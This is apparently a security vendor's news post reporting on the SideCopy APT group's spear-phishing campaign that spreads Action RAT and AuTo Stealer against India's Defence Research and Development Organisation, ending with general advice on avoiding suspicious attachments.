HQ/EMEAFind out how we can help your business
Cybersecurity researchers have discovered a new malicious campaign aiming to spread the ‘Action RAT’ malware against the Ministry of Defence in India. Investigations reveal that the campaign, attributed to the SideCopy APT group, has a history of cyberattacks against Indian and Afghanistan organisations.
First detected in 2019, the Pakistani group SideCopy APT was observed sharing the same tactics with the Transparent Tribe group. In this recent campaign, SideCopy targeted the research and development division of India’s Ministry of Defence – Defence Research and Development Organization (DRDO).
SideCopy initially sets off spear-phishing emails in spreading the Action RAT.
In gaining initial access to a targeted machine, the threat operators deploy spear-phishing emails on targets, enclosing a ZIP archive file. This ZIP file contains an [.]LNK file masking as information about DRDO’s developed K-4 ballistic missile.
Once the victim launches the [.]LNK file on their computer, an HTML app will be retrieved from the attackers’ remote server, displaying a fake presentation while also deploying the Action RAT on the now compromised machine.
Aside from collecting data about the compromised machine, Action RAT also runs commands received from the attackers’ remote server, such as stealing sensitive files and dropping additional malware payloads for increased infection.
During the infection process, another stealer malware is also deployed called the AuTo Stealer, which can gather and steal data from MS Office files, PDF files, images over HTTP or TCP, and database and text files.
In December 2021, SideCopy was also found spreading Action RAT against numerous Afghan ministries and a government computer in India, leading to the theft of massive sensitive databases. The APT group also recently attacked Indian government agencies last February, in which they deployed a different malware strain called ReverseRAT.
Cybersecurity experts warn that this Pakistani APT group has continually upgraded its TTPs to inflict more effective and graver damage against its victims. Organisations are advised to safeguard their networks with robust security measures and avoid opening files attached to suspicious emails.
